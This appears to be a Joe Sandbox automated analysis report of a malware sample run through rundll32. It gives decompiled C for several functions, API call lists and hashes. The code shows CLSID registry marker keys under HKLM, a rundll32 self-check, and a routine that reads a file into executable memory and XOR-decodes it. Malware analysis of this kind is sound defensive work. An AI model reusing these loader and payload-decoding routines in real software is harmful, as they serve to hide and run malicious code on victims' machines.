                                                            0x0464c361
                                                            0x0464c345
                                                            0x0464c347
                                                            0x0464c354
                                                            0x0464c354
                                                            0x0464c366
                                                            0x0464c36d
                                                            0x0464c37d
                                                            0x0464c389
                                                            0x0464c38e
                                                            0x0464c395
                                                            0x0464c39b
                                                            0x0464c3a1
                                                            0x0464c3a3
                                                            0x0464c3ad
                                                            0x0464c3b6
                                                            0x0464c3c0
                                                            0x0464c3ca
                                                            0x0464c3da
                                                            0x0464c3da
                                                            0x0464c3e4
                                                            0x0464c3ee
                                                            0x0464c3fe
                                                            0x0464c3fe
                                                            0x0464c407
                                                            0x0464c40e
                                                            0x0464c410
                                                            0x0464c417
                                                            0x0464c417
                                                            0x0464c421
                                                            0x0464c42c
                                                            0x0464c430
                                                            0x0464c439
                                                            0x0464c446
                                                            0x0464c446
                                                            0x0464c3a3
                                                            0x0464c395
                                                            0x0464c2bb
                                                            0x0464c45b

                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000001,00000000), ref: 0464C27B
                                                            • lstrcmpiW.KERNEL32(-00000002,rundll32.exe), ref: 0464C297
                                                            • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 0464C2CC
                                                              • Part of subcall function 04646C70: wsprintfW.USER32 ref: 04646CB8
                                                              • Part of subcall function 04646C70: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 04646CF5
                                                              • Part of subcall function 04646C70: RegQueryValueExW.ADVAPI32(?,0467E09C,00000000,?,?,?), ref: 04646D20
                                                              • Part of subcall function 04646C70: RegCloseKey.ADVAPI32(?), ref: 04646D36
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0464C2DC
                                                            • PathFileExistsW.SHLWAPI(?), ref: 0464C310
                                                            • Sleep.KERNEL32(000003E8,?), ref: 0464C421
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0464C439
                                                            • DeleteFileW.KERNEL32(?), ref: 0464C446
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$ModuleName$CloseDeleteExistsFreeMoveOpenPathQuerySleepValueVirtuallstrcmpiwsprintf
                                                            • String ID: Control$Dispatch$dat$rundll32.exe
                                                            • API String ID: 2408718126-2128312152
                                                            • Opcode ID: c366bcac9fbb615640a474960a4eb6dd9f2cbd43ced17880e35b464b33ff27b9
                                                            • Instruction ID: 81fd11e69df8f1955615ed74de13e4fd206cc4558acdb5c97a061991ce2f6bec
                                                            • Opcode Fuzzy Hash: c366bcac9fbb615640a474960a4eb6dd9f2cbd43ced17880e35b464b33ff27b9
                                                            • Instruction Fuzzy Hash: 3B41F0B1A012189BFF24AB24DC84FAE736ADBD0718F054299D505E73C0FE74BE058B99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 94%
                                                            			E04646C70(void* __ebx, char __ecx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				void* _v612;
                                                            				char _v616;
                                                            				int _v620;
                                                            				int _v624;
                                                            				signed int _t28;
                                                            				long _t38;
                                                            				long _t41;
                                                            				char _t57;
                                                            				signed int _t71;
                                                            
                                                            				_t28 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t28 ^ _t71;
                                                            				_t57 = __ecx;
                                                            				_v616 = 0;
                                                            				_v620 = 4;
                                                            				E04646050(__ecx, L"SEOID",  &_v88, __edi, __esi); // executed
                                                            				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                            				E0465DEA0(__edi,  &_v616, 0, _v620);
                                                            				_v612 = 0;
                                                            				_t38 = RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20119,  &_v612); // executed
                                                            				if(_t38 != 0) {
                                                            					L3:
                                                            					_v616 = _t57;
                                                            					_v620 = 4;
                                                            					_v612 = 0;
                                                            					_t41 = RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0); // executed
                                                            					if(_t41 != 0) {
                                                            						L5:
                                                            						return E04655AFE(_v8 ^ _t71);
                                                            					} else {
                                                            						RegSetValueExW(_v612, "1", 0, 4,  &_v616, 4); // executed
                                                            						_t69 =  ==  ? 1 : 0;
                                                            						RegCloseKey(_v612);
                                                            						__eflags =  ==  ? 1 : 0;
                                                            						if(( ==  ? 1 : 0) != 0) {
                                                            							goto L2;
                                                            						} else {
                                                            							goto L5;
                                                            						}
                                                            					}
                                                            				} else {
                                                            					RegQueryValueExW(_v612, "1", 0,  &_v624,  &_v616,  &_v620);
                                                            					_t70 =  ==  ? 1 : 0;
                                                            					RegCloseKey(_v612);
                                                            					_t77 =  ==  ? 1 : 0;
                                                            					if(( ==  ? 1 : 0) == 0) {
                                                            						goto L3;
                                                            					} else {
                                                            						L2:
                                                            						return E04655AFE(_v8 ^ _t71);
                                                            					}
                                                            				}
                                                            			}















                                                            0x04646c79
                                                            0x04646c80
                                                            0x04646c84
                                                            0x04646c86
                                                            0x04646c94
                                                            0x04646ca3
                                                            0x04646cb8
                                                            0x04646cce
                                                            0x04646cd6
                                                            0x04646cf5
                                                            0x04646cfd
                                                            0x04646d56
                                                            0x04646d58
                                                            0x04646d65
                                                            0x04646d7f
                                                            0x04646d8b
                                                            0x04646d93
                                                            0x04646dd0
                                                            0x04646de1
                                                            0x04646d95
                                                            0x04646dac
                                                            0x04646dbf
                                                            0x04646dc2
                                                            0x04646dc8
                                                            0x04646dca
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04646dca
                                                            0x04646cff
                                                            0x04646d20
                                                            0x04646d33
                                                            0x04646d36
                                                            0x04646d3c
                                                            0x04646d3e
                                                            0x00000000
                                                            0x04646d40
                                                            0x04646d40
                                                            0x04646d55
                                                            0x04646d55
                                                            0x04646d3e

                                                            APIs
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 04646CB8
                                                            • RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 04646CF5
                                                            • RegQueryValueExW.ADVAPI32(?,0467E09C,00000000,?,?,?), ref: 04646D20
                                                            • RegCloseKey.ADVAPI32(?), ref: 04646D36
                                                            • RegCreateKeyExW.KERNEL32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 04646D8B
                                                            • RegSetValueExW.KERNEL32(?,0467E09C,00000000,00000004,?,00000004), ref: 04646DAC
                                                            • RegCloseKey.ADVAPI32(?), ref: 04646DC2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseValue$OpenQuery$Createwsprintf
                                                            • String ID: SEOID$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 3707868688-3437544703
                                                            • Opcode ID: 35a7a3ed4e1b9ca2e67916ee1b8371bd8d7c8fd8f0e95fff8066ada754181573
                                                            • Instruction ID: 4a3753e00869e1d232b717d564fc80b3900fce02c11a337b6ec18707d7f29c6c
                                                            • Opcode Fuzzy Hash: 35a7a3ed4e1b9ca2e67916ee1b8371bd8d7c8fd8f0e95fff8066ada754181573
                                                            • Instruction Fuzzy Hash: D1310E71A0922CABDB209FA0DC8CBEABBBCEF45710F0001D9A909E6111E7365E44DF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 92%
                                                            			E046494D0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				char _v612;
                                                            				void* _v616;
                                                            				int _v620;
                                                            				int _v624;
                                                            				signed int _t25;
                                                            				long _t35;
                                                            				char _t44;
                                                            				void* _t49;
                                                            				signed int _t65;
                                                            
                                                            				_t25 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t25 ^ _t65;
                                                            				E04646050(__ebx, __ecx,  &_v88, __edi, __esi); // executed
                                                            				_v612 = 0;
                                                            				_v620 = 4;
                                                            				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                            				E0465DEA0(__edi,  &_v612, 0, _v620);
                                                            				_v616 = 0;
                                                            				_t35 = RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20119,  &_v616); // executed
                                                            				if(_t35 != 0) {
                                                            					L6:
                                                            					goto L7;
                                                            				} else {
                                                            					RegQueryValueExW(_v616, "1", 0,  &_v624,  &_v612,  &_v620);
                                                            					_t64 =  ==  ? 1 : 0;
                                                            					RegCloseKey(_v616);
                                                            					_t72 =  ==  ? 1 : 0;
                                                            					if(( ==  ? 1 : 0) == 0) {
                                                            						goto L6;
                                                            					} else {
                                                            						_t44 = _v612 - 0x13c;
                                                            						_v612 = _t44;
                                                            						if(_t44 == 0x1fffffff || _t44 == 0x2fffffff) {
                                                            							L7:
                                                            							return E04655AFE(_v8 ^ _t65);
                                                            						} else {
                                                            							wsprintfW( &_v608, L"Global\\%s",  &_v88);
                                                            							_t49 = OpenEventW(0x1f0003, 0,  &_v608);
                                                            							if(_t49 == 0) {
                                                            								return E04655AFE(_v8 ^ _t65);
                                                            							} else {
                                                            								CloseHandle(_t49);
                                                            								goto L6;
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}















                                                            0x046494d9
                                                            0x046494e0
                                                            0x046494e7
                                                            0x046494ef
                                                            0x04649500
                                                            0x04649510
                                                            0x04649526
                                                            0x0464952e
                                                            0x0464954d
                                                            0x04649555
                                                            0x046495f3
                                                            0x00000000
                                                            0x0464955b
                                                            0x0464957c
                                                            0x0464958f
                                                            0x04649592
                                                            0x04649598
                                                            0x0464959a
                                                            0x00000000
                                                            0x0464959c
                                                            0x046495a2
                                                            0x046495a7
                                                            0x046495b2
                                                            0x046495fa
                                                            0x04649607
                                                            0x046495bb
                                                            0x046495cb
                                                            0x046495e2
                                                            0x046495ea
                                                            0x04649618
                                                            0x046495ec
                                                            0x046495ed
                                                            0x00000000
                                                            0x046495ed
                                                            0x046495ea
                                                            0x046495b2
                                                            0x0464959a

                                                            APIs
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 04649510
                                                            • RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 0464954D
                                                            • RegQueryValueExW.ADVAPI32(?,0467E09C,00000000,?,00000000,?), ref: 0464957C
                                                            • RegCloseKey.ADVAPI32(?), ref: 04649592
                                                            • wsprintfW.USER32 ref: 046495CB
                                                            • OpenEventW.KERNEL32(001F0003,00000000,?), ref: 046495E2
                                                            • CloseHandle.KERNEL32(00000000), ref: 046495ED
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpen$QueryValuewsprintf$EventHandle
                                                            • String ID: Global\%s$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 1348839613-2346361075
                                                            • Opcode ID: db37772194fdd7611ef3776b4ec18788e3ea67820bbf850cdf08a4a711d51320
                                                            • Instruction ID: f291d5e431a42be6577783cc515fc3442ca567001123b3a2960f5df596bf05c5
                                                            • Opcode Fuzzy Hash: db37772194fdd7611ef3776b4ec18788e3ea67820bbf850cdf08a4a711d51320
                                                            • Instruction Fuzzy Hash: AA31417194521C9BDB24DFA4DD8CBEA77BCEF44714F100195A909E2144FB35AE48CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 267 4649770-4649786 268 4649788 267->268 269 464978a-46497a9 CreateFileW 267->269 268->269 270 46498fc-4649902 269->270 271 46497af-46497c1 GetFileSize 269->271 272 46497c7-46497d4 271->272 273 46498f2-46498fb FindCloseChangeNotification 271->273 274 46497d6-46497e9 272->274 275 4649808-464980b 272->275 273->270 280 46498f1 274->280 282 46497ef-46497f4 274->282 276 4649860 275->276 277 464980d-4649820 ReadFile 275->277 281 4649862 276->281 279 4649826-464982b 277->279 277->280 283 464983c-4649846 279->283 284 464982d-4649839 279->284 280->273 285 4649865-4649879 VirtualAlloc 281->285 282->281 286 46497f6-4649806 282->286 283->280 287 464984c-464985e SetFilePointer 283->287 284->283 285->280 288 464987b-464988c ReadFile 285->288 286->281 287->285 288->280 289 464988e-4649893 288->289 290 4649895-46498b6 VirtualFree CloseHandle 289->290 291 46498b7-46498bb 289->291 292 46498bd-46498c0 291->292 293 46498de-46498ea call 4645540 291->293 292->293 294 46498c2-46498c6 292->294 293->280 300 46498ec-46498ef 293->300 294->293 296 46498c8-46498ca 294->296 298 46498d2 296->298 299 46498cc-46498d0 296->299 301 46498d6-46498d9 298->301 299->301 300->280 301->296 302 46498db 301->302 302->293
                                                            C-Code - Quality: 100%
                                                            			E04649770(intOrPtr* __ecx, WCHAR* __edx, intOrPtr _a4) {
                                                            				void _v8;
                                                            				long _v12;
                                                            				void* _v16;
                                                            				void* _v20;
                                                            				intOrPtr* _v24;
                                                            				void* _t36;
                                                            				intOrPtr _t40;
                                                            				void* _t41;
                                                            				signed char _t46;
                                                            				int _t52;
                                                            				void _t53;
                                                            				long _t60;
                                                            				void* _t62;
                                                            				intOrPtr* _t67;
                                                            				WCHAR* _t68;
                                                            				long _t69;
                                                            				long _t71;
                                                            				void* _t76;
                                                            
                                                            				_t68 = __edx;
                                                            				_t76 = 0;
                                                            				_v24 = __ecx;
                                                            				_v8 = 0;
                                                            				_v12 = 0;
                                                            				if(__ecx != 0) {
                                                            					 *__ecx = 0;
                                                            				}
                                                            				_t36 = CreateFileW(_t68, 0x80000000, 0, 0, 3, 0x80, 0); // executed
                                                            				_v16 = _t36;
                                                            				if(_t36 == 0xffffffff) {
                                                            					L32:
                                                            					return _t76;
                                                            				} else {
                                                            					_t60 = GetFileSize(_t36, 0);
                                                            					_v20 = _t76;
                                                            					if(_t60 < 1) {
                                                            						L31:
                                                            						FindCloseChangeNotification(_v16); // executed
                                                            						goto L32;
                                                            					} else {
                                                            						_t40 = _a4;
                                                            						if(_t40 != 1) {
                                                            							if(_t40 != 2) {
                                                            								_t71 = _t60;
                                                            								goto L15;
                                                            							} else {
                                                            								_t52 = ReadFile(_v16,  &_v8, 4,  &_v12, 0); // executed
                                                            								if(_t52 == 0) {
                                                            									goto L30;
                                                            								} else {
                                                            									_t53 = _v8;
                                                            									if(_t53 > _t60) {
                                                            										_t53 = _t53 - 0xc8372a;
                                                            										_v20 = 1;
                                                            										_v8 = _t53;
                                                            									}
                                                            									_t71 = _t60 - _t53 - 4;
                                                            									if(_t71 < 1) {
                                                            										goto L30;
                                                            									} else {
                                                            										_t62 = _v16;
                                                            										SetFilePointer(_t62, _t53 + 4, 0, 0); // executed
                                                            										goto L16;
                                                            									}
                                                            								}
                                                            							}
                                                            						} else {
                                                            							if(ReadFile(_v16,  &_v8, 4,  &_v12, 0) == 0) {
                                                            								L30:
                                                            								goto L31;
                                                            							} else {
                                                            								_t71 = _v8;
                                                            								if(_t71 > _t60) {
                                                            									_t71 = _t71 - 0xc8372a;
                                                            									_v20 = 1;
                                                            									_v8 = _t71;
                                                            								}
                                                            								L15:
                                                            								_t62 = _v16;
                                                            								L16:
                                                            								_t41 = VirtualAlloc(0, _t71, 0x1000, 0x40); // executed
                                                            								_t76 = _t41;
                                                            								if(_t76 == 0 || ReadFile(_t62, _t76, _t71,  &_v12, 0) == 0) {
                                                            									goto L30;
                                                            								} else {
                                                            									_t69 = _v12;
                                                            									if(_t69 == _t71) {
                                                            										if(_v20 != 0 && _t69 > 1) {
                                                            											_t46 = 0;
                                                            											if(_t69 != 0) {
                                                            												do {
                                                            													if((_t46 & 0x00000001) != 0) {
                                                            														 *(_t76 + _t46) =  *(_t76 + _t46) ^ 0x0000006a;
                                                            													} else {
                                                            														 *(_t76 + _t46) =  *(_t76 + _t46) ^ 0x000000a7;
                                                            													}
                                                            													_t46 = _t46 + 1;
                                                            												} while (_t46 < _t69);
                                                            												_t69 = _v12;
                                                            											}
                                                            										}
                                                            										E04645540(_t76, _t69);
                                                            										_t67 = _v24;
                                                            										if(_t67 != 0) {
                                                            											 *_t67 = _v12;
                                                            										}
                                                            										goto L30;
                                                            									} else {
                                                            										VirtualFree(_t76, 0, 0x8000);
                                                            										CloseHandle(_v16);
                                                            										return 0;
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}





















                                                            0x04649770
                                                            0x04649779
                                                            0x0464977b
                                                            0x0464977e
                                                            0x04649781
                                                            0x04649786
                                                            0x04649788
                                                            0x04649788
                                                            0x0464979d
                                                            0x046497a3
                                                            0x046497a9
                                                            0x046498fc
                                                            0x04649902
                                                            0x046497af
                                                            0x046497b9
                                                            0x046497bb
                                                            0x046497c1
                                                            0x046498f2
                                                            0x046498f5
                                                            0x00000000
                                                            0x046497c7
                                                            0x046497c7
                                                            0x046497d4
                                                            0x0464980b
                                                            0x04649860
                                                            0x00000000
                                                            0x0464980d
                                                            0x0464981c
                                                            0x04649820
                                                            0x00000000
                                                            0x04649826
                                                            0x04649826
                                                            0x0464982b
                                                            0x0464982d
                                                            0x04649832
                                                            0x04649839
                                                            0x04649839
                                                            0x04649840
                                                            0x04649846
                                                            0x00000000
                                                            0x0464984c
                                                            0x0464984c
                                                            0x04649858
                                                            0x00000000
                                                            0x04649858
                                                            0x04649846
                                                            0x04649820
                                                            0x046497d6
                                                            0x046497e9
                                                            0x046498f1
                                                            0x00000000
                                                            0x046497ef
                                                            0x046497ef
                                                            0x046497f4
                                                            0x046497f6
                                                            0x046497fc
                                                            0x04649803
                                                            0x04649803
                                                            0x04649862
                                                            0x04649862
                                                            0x04649865
                                                            0x0464986f
                                                            0x04649875
                                                            0x04649879
                                                            0x00000000
                                                            0x0464988e
                                                            0x0464988e
                                                            0x04649893
                                                            0x046498bb
                                                            0x046498c2
                                                            0x046498c6
                                                            0x046498c8
                                                            0x046498ca
                                                            0x046498d2
                                                            0x046498cc
                                                            0x046498cc
                                                            0x046498cc
                                                            0x046498d6
                                                            0x046498d7
                                                            0x046498db
                                                            0x046498db
                                                            0x046498c6
                                                            0x046498e0
                                                            0x046498e5
                                                            0x046498ea
                                                            0x046498ef
                                                            0x046498ef
                                                            0x00000000
                                                            0x04649895
                                                            0x0464989d
                                                            0x046498a9
                                                            0x046498b6
                                                            0x046498b6
                                                            0x04649893
                                                            0x04649879
                                                            0x046497e9
                                                            0x046497d4
                                                            0x046497c1

                                                            APIs
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,?,?,0464C38E,00000001), ref: 0464979D
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0464C38E,00000001), ref: 046497B3
                                                            • ReadFile.KERNEL32(?,00000001,00000004,0464C38E,00000000,00000000,?,?,?,0464C38E,00000001), ref: 0464981C
                                                            • SetFilePointer.KERNEL32(?,-00000003,00000000,00000000,?,?,?,0464C38E,00000001), ref: 04649858
                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,?,?,0464C38E,00000001), ref: 0464986F
                                                            • ReadFile.KERNEL32(?,00000000,00000000,0464C38E,00000000,?,?,?,0464C38E,00000001), ref: 04649884
                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,0464C38E,00000001), ref: 0464989D
                                                            • CloseHandle.KERNEL32(?,?,?,0464C38E,00000001), ref: 046498A9
                                                            • FindCloseChangeNotification.KERNEL32(?,?,?,?,0464C38E,00000001), ref: 046498F5
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$CloseReadVirtual$AllocChangeCreateFindFreeHandleNotificationPointerSize
                                                            • String ID:
                                                            • API String ID: 3130169213-0
                                                            • Opcode ID: b54a5a89203b35a1350dfb08a9e68202fb7face8d675601da179bda5e7bf7793
                                                            • Instruction ID: d5f31bd4fb38759215434a94ab128345c97a478ffe65280550981870aa7d7399
                                                            • Opcode Fuzzy Hash: b54a5a89203b35a1350dfb08a9e68202fb7face8d675601da179bda5e7bf7793
                                                            • Instruction Fuzzy Hash: BD4185B1B80215AFDF148A79DC48BAF7B79EB94720F204555F504EB280FB71AA44CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 95%
                                                            			E046496B0(void* __ebx, char* __ecx, int __edx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				void* _v612;
                                                            				signed int _t11;
                                                            				int _t20;
                                                            				char* _t26;
                                                            				int _t35;
                                                            				signed int _t38;
                                                            
                                                            				_t11 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t11 ^ _t38;
                                                            				_t35 = __edx;
                                                            				_t26 = __ecx;
                                                            				E046454D0(__ecx, __edx);
                                                            				E04646050(__ecx, L"Global",  &_v88, __edx, __esi); // executed
                                                            				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                            				_v612 = 0;
                                                            				_t20 = RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0); // executed
                                                            				if(_t20 == 0) {
                                                            					RegSetValueExW(_v612, "1", _t20, 3, _t26, _t35); // executed
                                                            					_t37 =  ==  ? 1 : 0;
                                                            					RegCloseKey(_v612);
                                                            				}
                                                            				return E04655AFE(_v8 ^ _t38);
                                                            			}












                                                            0x046496b9
                                                            0x046496c0
                                                            0x046496c6
                                                            0x046496c8
                                                            0x046496ca
                                                            0x046496d7
                                                            0x046496ec
                                                            0x046496fd
                                                            0x0464971a
                                                            0x04649722
                                                            0x04649734
                                                            0x04649747
                                                            0x0464974a
                                                            0x0464974a
                                                            0x04649762

                                                            APIs
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 046496EC
                                                            • RegCreateKeyExW.KERNEL32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 0464971A
                                                            • RegSetValueExW.KERNEL32(?,0467E09C,00000000,00000003,00000000,00000000), ref: 04649734
                                                            • RegCloseKey.ADVAPI32(?), ref: 0464974A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseValue$CreateOpenQuerywsprintf
                                                            • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 73588525-1865207932
                                                            • Opcode ID: 3317ba7478164b274b7c002f074208bd08ec993a68049645b953af61ea80eb24
                                                            • Instruction ID: 9313e852defcb4fb0ff4c1316408cd278ec611d67685f96d19dd2064089f68da
                                                            • Opcode Fuzzy Hash: 3317ba7478164b274b7c002f074208bd08ec993a68049645b953af61ea80eb24
                                                            • Instruction Fuzzy Hash: 1F118A7160521CBBDB24DFA5DC8CEABBB7CEF44715F000199B909E2101FA755E04DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 312 4645960-464597f LoadLibraryA GetProcAddress 313 46459b1-46459b6 312->313 314 4645981-46459a0 GetNativeSystemInfo 312->314 315 46459a2-46459a6 314->315 316 46459a8-46459b0 314->316 315->313 315->316
                                                            C-Code - Quality: 29%
                                                            			E04645960() {
                                                            				intOrPtr _v8;
                                                            				char _v40;
                                                            				_Unknown_base(*)()* _t5;
                                                            				intOrPtr _t8;
                                                            
                                                            				_t5 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetNativeSystemInfo");
                                                            				if(_t5 == 0) {
                                                            					L4:
                                                            					return 0;
                                                            				} else {
                                                            					asm("xorps xmm0, xmm0");
                                                            					_v8 = 0;
                                                            					asm("movups [ebp-0x24], xmm0");
                                                            					asm("movups [ebp-0x14], xmm0"); // executed
                                                            					 *_t5( &_v40); // executed
                                                            					_t8 = _v40;
                                                            					if(_t8 == 6 || _t8 == 9) {
                                                            						return 1;
                                                            					} else {
                                                            						goto L4;
                                                            					}
                                                            				}
                                                            			}







                                                            0x04645977
                                                            0x0464597f
                                                            0x046459b1
                                                            0x046459b6
                                                            0x04645981
                                                            0x04645981
                                                            0x04645984
                                                            0x0464598f
                                                            0x04645993
                                                            0x04645997
                                                            0x04645999
                                                            0x046459a0
                                                            0x046459b0
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x046459a0

                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,0464C36B), ref: 04645970
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04645977
                                                            • GetNativeSystemInfo.KERNEL32(?), ref: 04645997
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressInfoLibraryLoadNativeProcSystem
                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                            • API String ID: 2103483237-192647395
                                                            • Opcode ID: 7a453e48e767b0ce3a9e8663d56a1dac4f7f967c0b439090f1a211f52e0f4c58
                                                            • Instruction ID: 848146ea54925f2f0f48972a054bfcc9074b769eaa1a4637a7a724263f7ef917
                                                            • Opcode Fuzzy Hash: 7a453e48e767b0ce3a9e8663d56a1dac4f7f967c0b439090f1a211f52e0f4c58
                                                            • Instruction Fuzzy Hash: 7DF0A731D4534997DF14EAE4D9097E973B4EB98314F505395FC09A2200FA666ED0C7A2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 327 4646ef0-4646f1a OpenProcess 328 4646fa5-4646fb5 call 4655afe 327->328 329 4646f20-4646f37 K32GetModuleFileNameExW 327->329 329->328 330 4646f39-4646f4c call 465d9be 329->330 335 4646f77-4646f7f 330->335 336 4646f4e-4646f51 330->336 338 4646f81-4646f8f 335->338 337 4646f53-4646f61 336->337 337->337 339 4646f63-4646f76 call 4655afe 337->339 338->338 340 4646f91-4646fa4 call 4655afe 338->340
                                                            C-Code - Quality: 45%
                                                            			E04646EF0(long __ecx, short* __edx, void* __esi) {
                                                            				signed int _v8;
                                                            				char _v528;
                                                            				signed int _t14;
                                                            				void* _t17;
                                                            				void* _t21;
                                                            				signed int _t23;
                                                            				signed short* _t26;
                                                            				signed short* _t33;
                                                            				signed int _t36;
                                                            				short* _t41;
                                                            				void* _t42;
                                                            				void* _t43;
                                                            				signed int _t44;
                                                            
                                                            				_t14 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t14 ^ _t44;
                                                            				_t41 = __edx;
                                                            				 *__edx = 0;
                                                            				_t17 = OpenProcess(0x400, 0, __ecx);
                                                            				if(_t17 == 0) {
                                                            					L9:
